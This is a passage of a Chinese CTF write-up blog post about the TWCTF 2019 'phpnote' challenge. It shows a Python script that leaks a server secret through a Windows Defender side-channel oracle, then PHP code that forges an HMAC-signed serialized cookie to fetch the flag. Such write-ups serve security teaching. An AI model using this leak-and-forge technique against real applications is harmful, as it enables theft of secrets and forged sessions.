class="string">"realname"</span>: <span class="string">"aaaaaaaaaaaaaaaaaaaaaa"</span></span><br><span class="line">    }</span><br><span class="line">    session.post(url + <span class="string">"login"</span>, data=data_1)</span><br><span class="line">    data_2 = {</span><br><span class="line">        <span class="string">"nickname"</span>: <span class="string">"&lt;/body&gt;"</span>,</span><br><span class="line">        <span class="string">"realname"</span>: payload</span><br><span class="line">    }</span><br><span class="line">    resp=session.post(url + <span class="string">"login"</span>, data=data_2)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">"Welcome"</span> <span class="keyword">not</span> <span class="keyword">in</span> resp.text:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leak</span><span class="params">(idx)</span>:</span></span><br><span class="line">    l, h = <span class="number">0</span>, <span class="number">0x100</span></span><br><span class="line">    <span class="keyword">while</span> h - l &gt; <span class="number">1</span>:</span><br><span class="line">        m = (h + l) // <span class="number">2</span></span><br><span class="line">        flags = trigger(m, idx)</span><br><span class="line">        <span class="keyword">if</span> flags:</span><br><span class="line">            l = m</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            h = m</span><br><span class="line">    <span class="keyword">return</span> chr(l)</span><br><span class="line"></span><br><span class="line">data = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">50</span>):</span><br><span class="line">    data += leak(i)</span><br><span class="line">    print(data)</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>跑一会，<code>secret</code>就跑出来了</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190909233328-2be928d8-d317-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>然后再用<code>secret</code>签名一下数据就能getflag了<br></p><figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$secret = "2532bd172578d19923e5348420e02320";</span><br><span class="line">$note = new Note(true);</span><br><span class="line">$note-&gt;addnote("abc","abc");</span><br><span class="line">$data = base64_encode(serialize($note));</span><br><span class="line">echo $data.PHP_EOL;</span><br><span class="line">echo hash_hmac('sha256', $data, $secret).PHP_EOL;</span><br><span class="line">var_dump(verify($data,hash_hmac('sha256', $data, $secret)));</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>改一下cookie访问<code>http://phpnote.chal.ctf.westerns.tokyo/?action=getflag</code>就能<code>getflag</code>了</p>
<p><code>TWCTF{h0pefully_I_haven't_made_a_m1stake_again}</code></p>
<h1 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h1><p><a href="https://westerns.tokyo/wctf2019-gtf/wctf2019-gtf-slides.pdf" target="_blank" rel="noopener">https://westerns.tokyo/wctf2019-gtf/wctf2019-gtf-slides.pdf</a><br><a href="https://meizjm3i.github.io/2019/08/01/%E5%88%A9%E7%94%A8Windows%20Defender%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB/" target="_blank" rel="noopener">https://meizjm3i.github.io/2019/08/01/%E5%88%A9%E7%94%A8Windows%20Defender%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB/</a></p>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
        </div>

        <blockquote class="post-copyright">
    
    <div class="content">
        
<span class="post-time">
    最后更新时间：<time datetime="2019-09-13T03:36:27.160Z" itemprop="dateUpdated">2019-09-13 11:36:27</time>
</span><br>


        
        know it then hack it
        
    </div>
    
    <footer>
        <a href="https://byqiyou.github.io">
            <img src="/img/avatar.jpg" alt="">
            
        </a>
    </footer>
</blockquote>

        
<div class="page-reward">
    <a id="rewardBtn" href="javascript:;" class="page-reward-btn waves-effect waves-circle waves-light">赏</a>
</div>



        <div class="post-footer">
            
	<ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf/">ctf</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/侧信道攻击/">侧信道攻击</a></li></ul>


            
<div class="page-share-wrap">
    

<div class="page-share" id="pageShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://byqiyou.github.io/2019/09/08/从一道CTF题了解Windows-Defender侧信道攻击/&title=《从一道CTF题了解Windows-Defender侧信道攻击》 — 七友&pic=https://byqiyou.github.io/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://byqiyou.github.io/2019/09/08/从一道CTF题了解Windows-Defender侧信道攻击/&title=《从一道CTF题了解Windows-Defender侧信道攻击》 — 七友&source=路漫漫其修远兮，吾将上下而求索" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://byqiyou.github.io/2019/09/08/从一道CTF题了解Windows-Defender侧信道攻击/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《从一道CTF题了解Windows-Defender侧信道攻击》 — 七友&url=https://byqiyou.github.io/2019/09/08/从一道CTF题了解Windows-Defender侧信道攻击/&via=https://byqiyou.github.io" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://byqiyou.github.io/2019/09/08/从一道CTF题了解Windows-Defender侧信道攻击/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>



    <a href="javascript:;" id="shareFab" class="page-share-fab waves-effect waves-circle">
        <i class="icon icon-share-alt icon-lg"></i>
    </a>
</div>



        </div>
    </div>

    
<nav class="post-nav flex-row flex-justify-between">
  
    <div class="waves-block waves-effect prev">
      <a href="/2019/10/02/windows中常见后门持久化方法总结/" id="post-prev" class="post-nav-link">
        <div class="tips"><i class="icon icon-angle-left icon-lg icon-pr"></i> Prev</div>
        <h4 class="title">windows中常见后门持久化方法总结</h4>
      </a>
    </div>
  

  
    <div class="waves-block waves-effect next">
      <a href="/2019/09/08/N1CTF2019渗透题题解/" id="post-next" class="post-nav-link">
        <div class="tips">Next <i class="icon icon-angle-right icon-lg icon-pl"></i></div>
        <h4 class="title">N1CTF2019渗透题题解</h4>
      </a>
    </div>
  
</nav>



    


<section class="comments" id="comments">
    <div id="disqus_thread"></div>
    <script>
    var disqus_shortname = 'true';
    lazyScripts.push('//' + disqus_shortname + '.disqus.com/embed.js')
    </script>
    <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</section>




<section class="comments" id="comments">
    <!-- UY BEGIN -->
    <div id="uyan_frame"></div>
    <script src="http://v2.uyan.cc/code/uyan.js?uid=true"></script>
    <!-- UY END -->
</section>
















</article>

<div id="reward" class="page-modal reward-lay">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <h3 class="reward-title">
        <i class="icon icon-quote-left"></i>
        Thinks
        <i class="icon icon-quote-right"></i>
    </h3>
    <div class="reward-content">
        
        <div class="reward-code">
            <img id="rewardCode" src="/img/2.png" alt="打赏二维码">
        </div>
        
        <label class="reward-toggle">
            <input id="rewardToggle" type="checkbox" class="reward-toggle-check"
                data-wechat="/img/2.png" data-alipay="/img/alipay.jpg">
            <div class="reward-toggle-ctrol">
                <span class="reward-toggle-item wechat">微信</span>
                <span class="reward-toggle-label"></span>
                <span class="reward-toggle-item alipay">支付宝</span>
            </div>
        </label>
        
    </div>
</div>



</div>

        <footer class="footer">
    <div class="top">
        
<p>
    <span id="busuanzi_container_site_uv" style='display:none'>
        站点总访客数：<span id="busuanzi_value_site_uv"></span>
    </span>
    <span id="busuanzi_container_site_pv" style='display:none'>
        站点总访问量：<span id="busuanzi_value_site_pv"></span>
    </span>
</p>


        <p>
            
            <span>博客内容遵循 <a rel="license" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">知识共享 署名 - 非商业性 - 相同方式共享 4.0 国际协议</a></span>
        </p>
    </div>
    <div class="bottom">
        <p><span> &copy; 2018 - 2019</span>
            <span>
                
                Power by <a href="http://hexo.io/" target="_blank">Hexo</a> Theme <a href="https://github.com/yscoder/hexo-theme-indigo" target="_blank">indigo</a>
            </span>
        </p>
    </div>
</footer>

    </main>
    <div class="mask" id="mask"></div>
<a href="javascript:;" id="gotop" class="waves-effect waves-circle waves-light"><span class="icon icon-lg icon-chevron-up"></span></a>



<div class="global-share" id="globalShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://byqiyou.github.io/2019/09/08/从一道CTF题了解Windows-Defender侧信道攻击/&title=《从一道CTF题了解Windows-Defender侧信道攻击》 — 七友&pic=https://byqiyou.github.io/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://byqiyou.github.io/2019/09/08/从一道CTF题了解Windows-Defender侧信道攻击/&title=《从一道CTF题了解Windows-Defender侧信道攻击》 — 七友&source=路漫漫其修远兮，吾将上下而求索" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://byqiyou.github.io/2019/09/08/从一道CTF题了解Windows-Defender侧信道攻击/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《从一道CTF题了解Windows-Defender侧信道攻击》 — 七友&url=https://byqiyou.github.io/2019/09/08/从一道CTF题了解Windows-Defender侧信道攻击/&via=https://byqiyou.github.io" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://byqiyou.github.io/2019/09/08/从一道CTF题了解Windows-Defender侧信道攻击/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>


<div class="page-modal wx-share" id="wxShare">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <p>扫一扫，分享到微信</p>
    <img src="//api.qrserver.com/v1/create-qr-code/?data=https://byqiyou.github.io/2019/09/08/从一道CTF题了解Windows-Defender侧信道攻击/" alt="微信分享二维码">
</div>




    <script src="//cdn.bootcss.com/node-waves/0.7.4/waves.min.js"></script>
<script>
var BLOG = { ROOT: '/', SHARE: true, REWARD: true };


</script>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/main.min.js"></script>


<div class="search-panel" id="search-panel">
    <ul class="search-result" id="search-result"></ul>
</div>
<template id="search-tpl">
<li class="item">
    <a href="{path}" class="waves-block waves-effect">
        <div class="title ellipsis" title="{title}">{title}</div>
        <div class="flex-row flex-middle">
            <div class="tags ellipsis">
                {tags}
            </div>
            <time class="flex-col time">{date}</time>
        </div>
    </a>
</li>
</template>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/search.min.js" async></script>






<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>



<script>
(function() {
    var OriginTitile = document.title, titleTime;
    document.addEventListener('visibilitychange', function() {
        if (document.hidden) {
            document.title = 'Leave';
            clearTimeout(titleTime);
        } else {
            document.title = 'Come back';
            titleTime = setTimeout(function() {
                document.title = OriginTitile;
            },2000);
        }
    });
})();
</script>



</body>
</html>
